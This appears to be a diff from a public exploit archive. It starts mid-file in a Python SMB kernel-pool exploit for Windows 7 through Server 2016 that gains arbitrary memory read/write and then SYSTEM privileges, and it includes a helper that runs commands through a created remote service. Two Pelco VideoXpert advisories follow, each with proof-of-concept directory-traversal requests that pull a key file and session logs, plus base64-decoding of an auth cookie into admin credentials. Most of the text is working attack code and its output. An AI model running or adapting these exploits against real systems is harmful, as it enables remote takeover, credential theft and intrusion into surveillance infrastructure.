 	bridePoolSize = 0x1000 - (info['GROOM_POOL_SIZE'] & 0xfff) - info['FRAG_POOL_SIZE']
 	info['BRIDE_TRANS_SIZE'] = bridePoolSize - (info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'])
 	print('BRIDE_TRANS_SIZE: 0x{:x}'.format(info['BRIDE_TRANS_SIZE']))
 	# bride paramters and data is alignment by 4 because it is TRANS
 	info['BRIDE_DATA_SIZE'] = info['BRIDE_TRANS_SIZE'] - 4 - info['TRANS_SIZE']  # empty transaction name (4)
 	return info['FRAG_POOL_SIZE']
 def align_transaction_and_leak(conn, tid, fid, info, numFill=4):
 	trans_param = pack('<HH', fid, 0)  # param for NT_RENAME
 	# fill large pagedpool holes (maybe no need)
 	for i in range(numFill):
 		conn.send_nt_trans(5, param=trans_param, totalDataCount=0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0)
 	mid_ntrename = conn.next_mid()
 	req1 = conn.create_nt_trans_packet(5, param=trans_param, mid=mid_ntrename, data='A'*0x10d0, maxParameterCount=info['GROOM_DATA_SIZE']-0x10d0)
 	req2 = conn.create_nt_trans_secondary_packet(mid_ntrename, data='B'*276) # leak more 276 bytes
 	req3 = conn.create_nt_trans_packet(5, param=trans_param, mid=fid, totalDataCount=info['GROOM_DATA_SIZE']-0x1000, maxParameterCount=0x1000)
 	reqs = []
 	for i in range(12):
 		mid = next_extra_mid()
 		reqs.append(conn.create_trans_packet('', mid=mid, param=trans_param, totalDataCount=info['BRIDE_DATA_SIZE']-0x200, totalParameterCount=0x200, maxDataCount=0, maxParameterCount=0))
 	conn.send_raw(req1[:-8])
 	conn.send_raw(req1[-8:]+req2+req3+''.join(reqs))
 	# expected transactions alignment ("Frag" pool is not shown)
 	#
 	#    |         5 * PAGE_SIZE         |   PAGE_SIZE    |         5 * PAGE_SIZE         |   PAGE_SIZE    |
 	#    +-------------------------------+----------------+-------------------------------+----------------+
 	#    |    GROOM mid=mid_ntrename        |  extra_mid1 |         GROOM mid=fid            |  extra_mid2 |
 	#    +-------------------------------+----------------+-------------------------------+----------------+
 	#
 	# If transactions are aligned as we expected, BRIDE transaction with mid=extra_mid1 will be leaked.
 	# From leaked transaction, we get
 	# - leaked transaction address from InParameter or InData
 	# - transaction, with mid=extra_mid2, address from LIST_ENTRY.Flink
 	# With these information, we can verify the transaction aligment from displacement.
 	leakData = conn.recv_transaction_data(mid_ntrename, 0x10d0+276)
 	leakData = leakData[0x10d4:]  # skip parameters and its own input
 	#open('leak.dat', 'wb').write(leakData)
 	if leakData[info['FRAG_TAG_OFFSET']:info['FRAG_TAG_OFFSET']+4] != 'Frag':
 		print('Not found Frag pool tag in leak data')
 		return None
 	# ================================
 	# verify leak data
 	# ================================
 	leakData = leakData[info['FRAG_TAG_OFFSET']-4+info['FRAG_POOL_SIZE']:]
 	# check pool tag and size value in buffer header
 	expected_size = pack('<H', info['BRIDE_TRANS_SIZE'])
 	leakTransOffset = info['POOL_ALIGN'] + info['SRV_BUFHDR_SIZE']
 	if leakData[0x4:0x8] != 'LStr' or leakData[info['POOL_ALIGN']:info['POOL_ALIGN']+2] != expected_size or leakData[leakTransOffset+2:leakTransOffset+4] != expected_size:
 		print('No transaction struct in leak data')
 		return None
 	leakTrans = leakData[leakTransOffset:]
 	ptrf = info['PTR_FMT']
 	_, connection_addr, session_addr, treeconnect_addr, flink_value = unpack_from('<'+ptrf*5, leakTrans, 8)
 	inparam_value = unpack_from('<'+ptrf, leakTrans, info['TRANS_INPARAM_OFFSET'])[0]
 	leak_mid = unpack_from('<H', leakTrans, info['TRANS_MID_OFFSET'])[0]
 	print('CONNECTION: 0x{:x}'.format(connection_addr))
 	print('SESSION: 0x{:x}'.format(session_addr))
 	print('FLINK: 0x{:x}'.format(flink_value))
 	print('InParam: 0x{:x}'.format(inparam_value))
 	print('MID: 0x{:x}'.format(leak_mid))
 	next_page_addr = (inparam_value & 0xfffffffffffff000) + 0x1000
 	if next_page_addr + info['GROOM_POOL_SIZE'] + info['FRAG_POOL_SIZE'] + info['POOL_ALIGN'] + info['SRV_BUFHDR_SIZE'] + info['TRANS_FLINK_OFFSET'] != flink_value:
 		print('unexpected alignment, diff: 0x{:x}'.format(flink_value - next_page_addr))
 		return None
 	# trans1: leak transaction
 	# trans2: next transaction
 	return {
 		'connection': connection_addr,
 		'session': session_addr,
 		'next_page_addr': next_page_addr,
 		'trans1_mid': leak_mid,
 		'trans1_addr': inparam_value - info['TRANS_SIZE'] - 4,
 		'trans2_addr': flink_value - info['TRANS_FLINK_OFFSET'],
 		'special_mid': special_mid,
 	}
 def read_data(conn, info, read_addr, read_size):
 	fmt = info['PTR_FMT']
 	# modify trans2.OutParameter to leak next transaction and trans2.OutData to leak real data
 	# modify trans2.*ParameterCount and trans2.*DataCount to limit data
 	new_data = pack('<'+fmt*3, info['trans2_addr']+info['TRANS_FLINK_OFFSET'], info['trans2_addr']+0x200, read_addr)  # OutParameter, InData, OutData
 	new_data += pack('<II', 0, 0)  # SetupCount, MaxSetupCount
 	new_data += pack('<III', 8, 8, 8)  # ParamterCount, TotalParamterCount, MaxParameterCount
 	new_data += pack('<III', read_size, read_size, read_size)  # DataCount, TotalDataCount, MaxDataCount
 	new_data += pack('<HH', 0, 5)  # Category, Function (NT_RENAME)
 	conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=new_data, dataDisplacement=info['TRANS_OUTPARAM_OFFSET'])
 	# create one more transaction before leaking data
 	# - next transaction can be used for arbitrary read/write after the current trans2 is done
 	# - next transaction address is from TransactionListEntry.Flink value
 	conn.send_nt_trans(5, param=pack('<HH', info['fid'], 0), totalDataCount=0x4300-0x20, totalParameterCount=0x1000)
 	# finish the trans2 to leak
 	conn.send_nt_trans_secondary(mid=info['trans2_mid'])
 	read_data = conn.recv_transaction_data(info['trans2_mid'], 8+read_size)
 	# set new trans2 address
 	info['trans2_addr'] = unpack_from('<'+fmt, read_data)[0] - info['TRANS_FLINK_OFFSET']
 	# set trans1.InData to &trans2
 	conn.send_nt_trans_secondary(mid=info['trans1_mid'], param=pack('<'+fmt, info['trans2_addr']), paramDisplacement=info['TRANS_INDATA_OFFSET'])
 	wait_for_request_processed(conn)
 	# modify trans2 mid
 	conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])
 	wait_for_request_processed(conn)
 	return read_data[8:]  # no need to return parameter
 def write_data(conn, info, write_addr, write_data):
 	# trans2.InData
 	conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<'+info['PTR_FMT'], write_addr), dataDisplacement=info['TRANS_INDATA_OFFSET'])
 	wait_for_request_processed(conn)
 	# write data
 	conn.send_nt_trans_secondary(mid=info['trans2_mid'], data=write_data)
 	wait_for_request_processed(conn)
 def exploit(target, pipe_name):
 	conn = MYSMB(target)
 	# set NODELAY to make exploit much faster
 	conn.get_socket().setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
 	info = {}
 	conn.login(USERNAME, PASSWORD, maxBufferSize=4356)
 	server_os = conn.get_server_os()
 	print('Target OS: '+server_os)
 	if server_os.startswith("Windows 7 ") or server_os.startswith("Windows Server 2008 R2"):
 		info.update(WIN7_INFO)
 	elif server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ") or server_os.startswith("Windows Server 2016 "):
 		info.update(WIN8_INFO)
 	else:
 		print('This exploit does not support this target')
 		sys.exit()
 	# ================================
 	# try align pagedpool and leak info until satisfy
 	# ================================
 	leakInfo = None
 	# max attempt: 10
 	for i in range(10):
 		tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
 		conn.set_default_tid(tid)
 		# fid for first open is always 0x4000. We can open named pipe multiple times to get other fids.
 		fid = conn.nt_create_andx(tid, pipe_name)
 		if 'FRAG_POOL_SIZE' not in info:
 			leak_frag_size(conn, tid, fid, info)
 		reset_extra_mid(conn)
 		leakInfo = align_transaction_and_leak(conn, tid, fid, info)
 		if leakInfo is not None:
 			break
 		print('leak failed... try again')
 		conn.close(tid, fid)
 		conn.disconnect_tree(tid)
 	if leakInfo is None:
 		return False
 	info['fid'] = fid
 	info.update(leakInfo)
 	# ================================
 	# shift trans1.Indata ptr with SmbWriteAndX
 	# ================================
 	shift_indata_byte = 0x200
 	conn.do_write_andx_raw_pipe(fid, 'A'*shift_indata_byte)
 	# Note: Even the distance between bride transaction is exactly what we want, the groom transaction might be in a wrong place.
 	#       So the below operation is still dangerous. Write only 1 byte with '\x00' might be safe even alignment is wrong.
 	# maxParameterCount (0x1000), trans name (4), param (4)
 	indata_value = info['next_page_addr'] + info['TRANS_SIZE'] + 8 + info['SRV_BUFHDR_SIZE'] + 0x1000 + shift_indata_byte
 	indata_next_trans_displacement = info['trans2_addr'] - indata_value
 	conn.send_nt_trans_secondary(mid=fid, data='\x00', dataDisplacement=indata_next_trans_displacement + info['TRANS_MID_OFFSET'])
 	wait_for_request_processed(conn)
 	# if the overwritten is correct, a modified transaction mid should be special_mid now.
 	# a new transaction with special_mid should be error.
 	recvPkt = conn.send_nt_trans(5, mid=special_mid, param=pack('<HH', fid, 0), data='')
 	if recvPkt.getNTStatus() != 0x10002:  # invalid SMB
 		print('unexpected return status: 0x{:x}'.format(recvPkt.getNTStatus()))
 		print('!!! Write to wrong place !!!')
 		print('the target might be crashed')
 		sys.exit()
 	print('success controlling groom transaction')
 	# NSA exploit set refCnt on leaked transaction to very large number for reading data repeatly
 	# but this method make the transation never get freed
 	# I will avoid memory leak
 	# ================================
 	# modify trans1 struct to be used for arbitrary read/write
 	# ================================
 	print('modify trans1 struct for arbitrary read/write')
 	fmt = info['PTR_FMT']
 	# modify trans_special.InData to &trans1
 	conn.send_nt_trans_secondary(mid=fid, data=pack('<'+fmt, info['trans1_addr']), dataDisplacement=indata_next_trans_displacement + info['TRANS_INDATA_OFFSET'])
 	wait_for_request_processed(conn)
 	# modify
 	# - trans1.InParameter to &trans1. so we can modify trans1 struct with itself
 	# - trans1.InData to &trans2. so we can modify trans2 easily
 	conn.send_nt_trans_secondary(mid=info['special_mid'], data=pack('<'+fmt*3, info['trans1_addr'], info['trans1_addr']+0x200, info['trans2_addr']), dataDisplacement=info['TRANS_INPARAM_OFFSET'])
 	wait_for_request_processed(conn)
 	# modify trans2.mid
 	info['trans2_mid'] = conn.next_mid()
 	conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])
 	# Now, read_data() and write_data() can be used for arbitrary read and write.
 	# ================================
 	# Modify this SMB session to be SYSTEM
 	# ================================	
 	# Note: Windows XP stores only PCtxtHandle and uses ImpersonateSecurityContext() for impersonation, so this
 	#         method does not work on Windows XP. But with arbitrary read/write, code execution is not difficult.
 	print('make this SMB session to be SYSTEM')
 	# IsNullSession = 0, IsAdmin = 1
 	write_data(conn, info, info['session']+info['SESSION_ISNULL_OFFSET'], '\x00\x01')
 	# read session struct to get SecurityContext address
 	sessionData = read_data(conn, info, info['session'], 0x100)
 	secCtxAddr = unpack_from('<'+fmt, sessionData, info['SESSION_SECCTX_OFFSET'])[0]
 	# copy SecurityContext for restoration
 	secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE'])
 	print('overwriting session security context')
 	# see FAKE_SECCTX detail at top of the file
 	write_data(conn, info, secCtxAddr, info['FAKE_SECCTX'])
 	# ================================
 	# do whatever we want as SYSTEM over this SMB connection
 	# ================================	
 	try:
 		smb_pwn(conn)
 	except:
 		pass
 	# restore SecurityContext. If the exploit does not use null session, PCtxtHandle will be leaked.
 	write_data(conn, info, secCtxAddr, secCtxData)
 	conn.disconnect_tree(tid)
 	conn.logoff()
 	conn.get_socket().close()
 	return True
 def smb_pwn(conn):
 	smbConn = smbconnection.SMBConnection(conn.get_remote_host(), conn.get_remote_host(), existingConnection=conn, manualNegotiate=True)
 	print('creating file c:\\pwned.txt on the target')
 	tid2 = smbConn.connectTree('C$')
 	fid2 = smbConn.createFile(tid2, '/pwned.txt')
 	smbConn.closeFile(tid2, fid2)
 	smbConn.disconnectTree(tid2)
 	#service_exec(smbConn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
 # based on impacket/examples/serviceinstall.py
 def service_exec(smbConn, cmd):
 	import random
 	import string
 	from impacket.dcerpc.v5 import transport, srvs, scmr
 	service_name = ''.join([random.choice(string.letters) for i in range(4)])
 	# Setup up a DCE SMBTransport with the connection already in place
 	rpctransport = transport.SMBTransport(smbConn.getRemoteHost(), smbConn.getRemoteHost(), filename=r'\svcctl', smb_connection=smbConn)
 	rpcsvc = rpctransport.get_dce_rpc()
 	rpcsvc.connect()
 	rpcsvc.bind(scmr.MSRPC_UUID_SCMR)
 	svnHandle = None
 	try:
 		print("Opening SVCManager on %s....." % smbConn.getRemoteHost())
 		resp = scmr.hROpenSCManagerW(rpcsvc)
 		svcHandle = resp['lpScHandle']
 		# First we try to open the service in case it exists. If it does, we remove it.
 		try:
 			resp = scmr.hROpenServiceW(rpcsvc, svcHandle, service_name+'\x00')
 		except Exception, e:
 			if str(e).find('ERROR_SERVICE_DOES_NOT_EXIST') == -1:
 				raise e  # Unexpected error
 		else:
 			# It exists, remove it
 			scmr.hRDeleteService(rpcsvc, resp['lpServiceHandle'])
 			scmr.hRCloseServiceHandle(rpcsvc, resp['lpServiceHandle'])
 		print('Creating service %s.....' % service_name)
 		resp = scmr.hRCreateServiceW(rpcsvc, svcHandle, service_name + '\x00', service_name + '\x00', lpBinaryPathName=cmd + '\x00')
 		serviceHandle = resp['lpServiceHandle']
 		if serviceHandle:
 			# Start service
 			try:
 				print('Starting service %s.....' % service_name)
 				scmr.hRStartServiceW(rpcsvc, serviceHandle)
 				# is it really need to stop?
 				# using command line always makes starting service fail because SetServiceStatus() does not get called
 				print('Stoping service %s.....' % service_name)
 				scmr.hRControlService(rpcsvc, serviceHandle, scmr.SERVICE_CONTROL_STOP)
 			except Exception, e:
 				print(str(e))
 			print('Removing service %s.....' % service_name)
 			scmr.hRDeleteService(rpcsvc, serviceHandle)
 			scmr.hRCloseServiceHandle(rpcsvc, serviceHandle)
 	except Exception, e:
 		print("ServiceExec Error on: %s" % smbConn.getRemoteHost())
 		print(str(e))
 	finally:
 		if svcHandle:
 			scmr.hRCloseServiceHandle(rpcsvc, svcHandle)
 	rpcsvc.disconnect()
 if len(sys.argv) != 3:
 	print("{} <ip> <pipe_name>".format(sys.argv[0]))
 	sys.exit(1)
 target = sys.argv[1]
 pipe_name = sys.argv[2]
 exploit(target, pipe_name)
 print('Done')
--- a/platforms/windows/webapps/42311.txt
+++ b/platforms/windows/webapps/42311.txt
@ -0,0 +1,149 @@
 Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal
 Vendor: Schneider Electric SE
 Product web page: https://www.pelco.com
 Affected version: 2.0.41
                  1.14.7
                  1.12.105
 Summary: VideoXpert is a video management solution designed for
 scalability, fitting the needs surveillance operations of any size.
 VideoXpert Ultimate can also aggregate other VideoXpert systems,
 tying multiple video management systems into a single interface.
 Desc: Pelco VideoXpert suffers from a directory traversal vulnerability.
 Exploiting this issue will allow an unauthenticated attacker to
 view arbitrary files within the context of the web server.
 Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Jetty(9.2.6.v20141205)
           MongoDB/3.2.10
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2017-5419
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php
 05.04.2017
 --
 PoC:
 ----
 GET /portal//..\\\..\\\..\\\..\\\windows\win.ini HTTP/1.1
 Host: 172.19.0.198
 Accept: */*
 Accept-Language: en
 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
 Connection: close
 HTTP/1.1 200 OK
 Date: Wed, 05 Apr 2017 13:27:39 GMT
 Last-Modified: Tue, 14 Jul 2009 05:09:22 GMT
 Cache-Control: public, max-age=86400
 Content-Type: text/html; charset=UTF-8
 Vary: Accept-Encoding
 ETag: 1247548162000
 Content-Length: 403
 Connection: close
 ; for 16-bit app support
 [fonts]
 [extensions]
 [mci extensions]
 [files]
 [Mail]
 MAPI=1
 [MCI Extensions.BAK]
 3g2=MPEGVideo
 3gp=MPEGVideo
 3gp2=MPEGVideo
 3gpp=MPEGVideo
 aac=MPEGVideo
 adt=MPEGVideo
 adts=MPEGVideo
 m2t=MPEGVideo
 m2ts=MPEGVideo
 m2v=MPEGVideo
 m4a=MPEGVideo
 m4v=MPEGVideo
 mod=MPEGVideo
 mov=MPEGVideo
 mp4=MPEGVideo
 mp4v=MPEGVideo
 mts=MPEGVideo
 ts=MPEGVideo
 tts=MPEGVideo
 ------
 GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\db\security\key.pem HTTP/1.1
 Host: 172.19.0.198
 Accept: */*
 Accept-Language: en
 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
 Connection: close
 HTTP/1.1 200 OK
 Date: Thu, 06 Apr 2017 11:59:07 GMT
 Last-Modified: Wed, 05 Apr 2017 12:58:36 GMT
 Cache-Control: public, max-age=86400
 Content-Type: text/html; charset=UTF-8
 ETag: 1491397116000
 Content-Length: 9
 Connection: close
 T0ps3cret
 ------
 bash-4.4$ cat pelco_system_ini.txt
 GET /portal//..\\\..\\\..\\\..\\\windows\system.ini HTTP/1.1
 Host: 172.19.0.198
 Accept: */*
 Accept-Language: en
 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
 Connection: close
 bash-4.4$ ncat -v -n 172.19.0.198 80 < pelco_system_ini.txt
 Ncat: Version 7.40 ( https://nmap.org/ncat )
 Ncat: Connected to 172.19.0.198:80.
 HTTP/1.1 200 OK
 Date: Thu, 06 Apr 2017 12:30:01 GMT
 Last-Modified: Wed, 10 Jun 2009 21:08:04 GMT
 Cache-Control: public, max-age=86400
 Content-Type: text/html; charset=UTF-8
 ETag: 1244668084000
 Content-Length: 219
 Connection: close
 ; for 16-bit app support
 [386Enh]
 woafont=dosapp.fon
 EGA80WOA.FON=EGA80WOA.FON
 EGA40WOA.FON=EGA40WOA.FON
 CGA80WOA.FON=CGA80WOA.FON
 CGA40WOA.FON=CGA40WOA.FON
 [drivers]
 wave=mmdrv.dll
 timer=timer.drv
 [mci]
 Ncat: 220 bytes sent, 460 bytes received in 0.03 seconds.
 bash-4.4$ 
--- a/platforms/windows/webapps/42312.txt
+++ b/platforms/windows/webapps/42312.txt
@ -0,0 +1,81 @@
 Schneider Electric Pelco VideoXpert Missing Encryption Of Sensitive Information
 Vendor: Schneider Electric SE
 Product web page: https://www.pelco.com
 Affected version: 2.0.41
                  1.14.7
                  1.12.105
 Summary: VideoXpert is a video management solution designed for
 scalability, fitting the needs surveillance operations of any size.
 VideoXpert Ultimate can also aggregate other VideoXpert systems,
 tying multiple video management systems into a single interface.
 Desc: The software transmits sensitive data using double Base64 encoding
 for the Cookie 'auth_token' in a communication channel that can be
 sniffed by unauthorized actors or arbitrarely be read from the vxcore
 log file directly using directory traversal attack resulting in
 authentication bypass / session hijacking.
 Ref: ZSL-2017-5419
 Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Jetty(9.2.6.v20141205)
           MongoDB/3.2.10
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2017-5420
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5420.php
 05.04.2017
 --
 After a user logs in, the web server creates a Cookie: auth_token which has the following value:
 ZXlKMWMyVnlibUZ0WlNJNkltRmtiV2x1SWl3aWNHRnpjM2R2Y21RaU9pSmhaRzFwYmpFeU15SXNJbVJ2YldGcGJpSTZJa3hQUTBGTUlpd2laWGh3YVhKbGN5STZNVFE1TVRVMU5qYzVOekUxT0N3aVlXZGxiblFpT2lJME1HWTJORE00TmkxbVptTXdMVFExTkRFdE9XTmpaQzFoTlRJeU0yUmlNbVpqTURraUxDSmpiR2xsYm5SSmNDSTZJakV5Tnk0d0xqQXVNU0o5
 Base64 decoding that becomes:
 eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbjEyMyIsImRvbWFpbiI6IkxPQ0FMIiwiZXhwaXJlcyI6MTQ5MTU1Njc5NzE1OCwiYWdlbnQiOiI0MGY2NDM4Ni1mZmMwLTQ1NDEtOWNjZC1hNTIyM2RiMmZjMDkiLCJjbGllbnRJcCI6IjEyNy4wLjAuMSJ9
 Again decoding, gives us result:
 {"username":"admin","password":"admin123","domain":"LOCAL","expires":1491556797158,"agent":"40f64386-ffc0-4541-9ccd-a5223db2fc09","clientIp":"127.0.0.1"}
 PoC remote session takeover with directory traversal:
 -----------------------------------------------------
 bash-4.4$ cat pelco_live.txt
 GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\core\vxcore.log HTTP/1.1
 Host: 127.0.0.1
 Connection: close
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36
 Content-Type: text/plain; charset=utf-8
 Accept: */*
 Referer: https://127.0.0.1/portal/
 Accept-Language: en-US,en;q=0.8,mk;q=0.6
 DNT: 1
 bash-4.4$ ncat -v -n 127.0.0.1 80 < pelco_live.txt > vxcore_log.txt
 bash-4.4$ cat vxcore_log.txt
 --snip--
 INFO  [2017-04-06 11:20:09.999] [HealthCheckMonitorPollingThread-0] org.mongodb.driver.connection: Closed connection [connectionId{localValue:400, serverValue:473}] to mongod0-rs1-dfde27ce-6a4f-413a-a7c2-6df855d462df:31001 because the pool has been closed. 
 INFO  [2017-04-06 11:20:12.559] [dw-5099 - GET /portal/System.html?auth_token=ZXlKMWMyVnlibUZ0WlNJNkltRmtiV2x1SWl3aWNHRnpjM2R2Y21RaU9pSmhaRzFwYmpFeU15SXNJbVJ2YldGcGJpSTZJa3hQUTBGTUlpd2laWGh3YVhKbGN5STZNVFE1TVRVMU5qYzVOekUxT0N3aVlXZGxiblFpT2lJME1HWTJORE00TmkxbVptTXdMVFExTkRFdE9XTmpaQzFoTlRJeU0yUmlNbVpqTURraUxDSmpiR2xsYm5SSmNDSTZJakV5Tnk0d0xqQXVNU0o5] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/System.html 
 INFO  [2017-04-06 11:20:12.567] [dw-5055 - GET /portal/Lilac.css] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/Lilac.css 
 INFO  [2017-04-06 11:20:12.568] [dw-5098 - GET /portal/lilac/lilac.nocache.js] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/lilac/lilac.nocache.js 
 --snip--
 bash-4.4$ cat pelco_auth_token.txt
 ZXlKMWMyVnlibUZ0WlNJNkltRmtiV2x1SWl3aWNHRnpjM2R2Y21RaU9pSmhaRzFwYmpFeU15SXNJbVJ2YldGcGJpSTZJa3hQUTBGTUlpd2laWGh3YVhKbGN5STZNVFE1TVRVMU5qYzVOekUxT0N3aVlXZGxiblFpT2lJME1HWTJORE00TmkxbVptTXdMVFExTkRFdE9XTmpaQzFoTlRJeU0yUmlNbVpqTURraUxDSmpiR2xsYm5SSmNDSTZJakV5Tnk0d0xqQXVNU0o5
 bash-4.4$ base64 -D pelco_auth_token.txt |base64 -D -
 {"username":"admin","password":"admin123","domain":"LOCAL","expires":1491556797158,"agent":"40f64386-ffc0-4541-9ccd-a5223db2fc09","clientIp":"127.0.0.1"}
 bash-4.4$